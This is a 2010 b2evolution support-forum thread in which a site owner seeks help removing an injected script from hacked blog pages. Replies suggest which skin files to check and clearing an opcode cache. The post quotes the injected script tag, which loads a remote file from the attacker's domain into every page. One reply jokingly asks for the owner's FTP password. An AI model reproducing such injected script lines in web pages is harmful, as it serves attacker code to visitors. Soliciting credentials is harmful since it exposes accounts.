Recent Topics
  1. b2evolution CMS Support Forums
  2. b2evolution Support
  3. General Support
  4. [3.3.3] Can not find Hackers script - PLEASE HELP!

[3.3.3] Can not find Hackers script - PLEASE HELP!

1 May 31, 2010 02:20    

My b2evolution Version: 3.3.3

My server was hacked several days ago. someone added a script to every html.php page and now Google is restricting the site. jeevanswarg.com is the hacker.

I have removed/over written every html and php page within the entire blog yet when I view source code on every post I still see the script - even on a brand new test page.

look for yourself but not in Firefox since Google is restricting it:
http://www.ny-unique.com/blog/index.php/client-list

Every link within the blog also contains this script, but noone of us can find when it resides!

I cannot find if there is a linked on an included file that was also hacked. I have also checked the database but just found 1 session from this person which I deleted.

The script appears between the closing HEAD and first BODY tags.

<link rel="stylesheet" href="style.css" type="text/css" />
</head>

<script src=http://jeevanswarg.com/images/services.php ></script>

<body>

If anyone knows how I can remove this code, what file it appears on, please let me know ASAP!

Back to top

2 May 31, 2010 02:55

The script may be included anywhere, but most likely in either index.main.php or _html_header.inc.php in your b2evo skin.

The actual file is jeevanswarg.com/images/services.php so you may want to delete (or rename) it asap

Back to top

3 May 31, 2010 05:38

thank you for your reply.

I have 3 skins installed, I removed everything else to be safe:

Both index.main.php or _html_header.inc.php did not contain any questionable code.

I have no access to jeevanswarg.com/images/services.php since this is the hackers domain

Back to top

4 May 31, 2010 05:42

Can you PM me your FTP password? It has already been leaked to the hacker, so there's nothing to worry about :)

Back to top

5 May 31, 2010 14:33

If you are running an opcode cache (like APC), make sure you clear it. You may have successfully eliminated the offending code, but a cached version might still be fighting you.

The script appears between the closing HEAD and first BODY tags.

That would definitely suggest the _html_header.inc.php file, but check the _body_header.inc.php file just to be sure.

Back to top


Form is loading...